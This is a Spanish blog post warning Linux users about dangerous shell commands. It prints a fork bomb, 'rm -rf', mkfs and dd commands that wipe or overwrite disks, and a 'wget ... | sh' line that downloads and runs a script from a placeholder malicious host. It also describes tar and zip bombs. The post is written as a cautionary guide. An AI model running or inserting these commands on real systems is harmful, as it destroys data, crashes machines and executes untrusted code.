Linux: Comandos para dar leña!

-: – Pregunta de examen 😉 – :-

<· ¿Alguien duda de la efectividad y potencia del “Shell” de Linux? ·>

Pues sí, así es.. con una simple “instrucción” (y no militar) la podemos “liar” a base de bien y cepillarnossin querer“: – archivos, directorios, raíz, etc -. Nuestro querido – “SO” – Linux “ejecutará” el comando de inmediato y sin preguntarnos (no suele pedir confirmación) pudiendo causar la pérdida de datosútiles e importantes” y hacer que nos acordemos de alguien.. o algo, así que mucho cuidado con lo que tecleáis… };P

ASINTIENDO CON LA CABEZA (5)_thumb

Veamos unos cuantos comandos “peligrosos”..


Bomba “fork”

tumblr_n2k8tctK1F1r93xiko1_500

-) Esta es una funciónbash“. Una vez que se ejecuta, se repite varias veces hasta que – bloqueamos el sistema -.

Causas: provoca una “denegación de servicio” hasta el punto que tenemos que reiniciar el servidor. Ejemplo;

:(){ :|: & };:

mv directorio/dev/null

cc_emmy_7_130920

-) Este es otro comando muy “de riesgo”-: dev/null o “el dispositivo null” descarta todos los datos escritos en él, pero informa que la operación de escritura se ha realizado correctamente. También conocido como “agujero negro” o “bit bucked. Ejemplo;

mv directorio/dev/null

rm -rf

tumblr_m9hnbpBeQ31qcxw0w

-) Este comando borra “archivos y directorios” (suena bien ehh!). Hay que tener mucho “cuidado” al utilizarlo. El parámetro “-r” elimina el contenido de una carpeta de forma “recursiva” y el parámetro-f‘ fuerza la eliminación sin preguntar (mola!)… Ejemplo;

rm -rf

mkfs

jtl27m

-) Si desconoces el propósito de este “comando” puede resultar muy “peligroso“. Cualquier cosa que añadas después de “mkfs” será – formateada y reemplazada – por un sistema de archivos en blanco: mkfs, mkfs.ext3, mkfs.bfs, mkfs.ext2, mkfs.minix, mkfs.msdos, mkfs.reiserfs, mkfs.vfat, mkfs.cramfs (este último sin necesidad de tener permisos de administración).

Ejemplo;

mkfs

Bomba “tar”

giphy

-) Es un archivo “empaquetado” que “explota” en miles o millones de archivos con nombres similares a los archivos existentes en el directorio actual en vez de en un directorio nuevo. La forma de evitarlo sería crear y entrar en un directorio nuevo antes de desempaquetarlo o listar el contenido previamente con –t.


dd

George-Clooney-Sexy-74116

-) El comando “dd” se utiliza para – copiar y convertir – particiones del disco duro. Sin embargo, puede llegar a ser “perjudicial” si se especifica el destino equivocado. Ejemplos;

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
dd if=/dev/zero of=/dev/had - (will zero out the whole primary hard drive)


Código shell script

Jim-Carrey-GIF-PACK-10

-) Alguien que te tiene mucho “cariño” podría enviarte un “enlace” (y no matrimonial precisamente) para que descargues y “ejecutes” un “shell script“.

Ejemplo;

wget http://some_malicious_source -O- | sh

Código fuente malicioso

tumblr_m5n37lVFPN1r9etlyo1_500

-) Alguien (tal vez esa persona tan cariñosa!) podría facilitarte “código fuente” para “compilarlo“. Dicho código podría parecer un “código normal“, pero en realidad puede tratarse de algún – código malicioso – oculto entre código fuente normal que puede causar “daños” a tu sistema. Para evitar ser víctima de este tipo de ataque, sólo debes aceptar y compilar el código fuente de fuentes confiables.


Bomba de descompresión

4F2

-) Una “bomba zip” es un archivo que parece ser muy pequeño, de unos pocos “KB“, pero que cuando se descomprime lo hace en cientos de “GB” de datos pudiendo llenar tu “disco duro para reducir el rendimiento del sistema.

Salu2


TonyHAT - 219

Anuncios

Un comentario en “Linux: Comandos para dar leña!”

Responder

Por favor, inicia sesión con uno de estos métodos para publicar tu comentario:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s